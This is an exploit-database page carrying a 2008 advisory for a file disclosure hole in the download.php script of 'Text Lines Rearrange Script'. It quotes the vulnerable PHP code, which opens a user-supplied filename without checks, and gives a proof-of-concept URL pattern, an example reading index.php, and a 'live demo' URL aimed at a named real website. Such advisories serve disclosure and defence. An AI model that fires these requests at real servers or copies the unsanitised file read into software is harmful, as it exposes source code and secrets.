header-logo
Suggest Exploit
vendor:
Text Lines Rearrange Script
by:
SirGod
7.5
CVSS
HIGH
File Disclosure
22
CWE
Product Name: Text Lines Rearrange Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Text Lines Rearrange Script (download.php filename) File Disclosure Vulnerability

A vulnerability in Text Lines Rearrange Script (download.php filename) allows an attacker to read arbitrary files on the server. The vulnerability is due to insufficient sanitization of user-supplied input to the 'filename' parameter in the download.php script. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable script with a specially crafted filename parameter. This will allow the attacker to read arbitrary files on the server.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

#############################################################################################
[+] Text Lines Rearrange Script (download.php filename) File
Disclosure Vulnerability
[+] Discovered By SirGod
[+] Visit : www.h4cky0u.org
[+] Greetz : All my friends
#############################################################################################

 [+] File Disclosure Vulnerability

  Vulnerable Code in download.php :

-----------------------------------------------------

if(file_exists($filename))
{
	$fp=fopen($filename,"r");
	$content=fread($fp,filesize($filename));
	fclose($fp);
	
------------------------------------------------------	
	
 PoC :

  http://[target]/[path]/download.php?filename=[Local File]

 Example :

  http://[target]/[path]/download.php?filename=index.php

 Live Demo :

  http://www.rightscripts.com/listrearrange/download.php?filename=index.php

#############################################################################################

# milw0rm.com [2008-12-22]

Navigation

Suggest Exploit

Services By CQR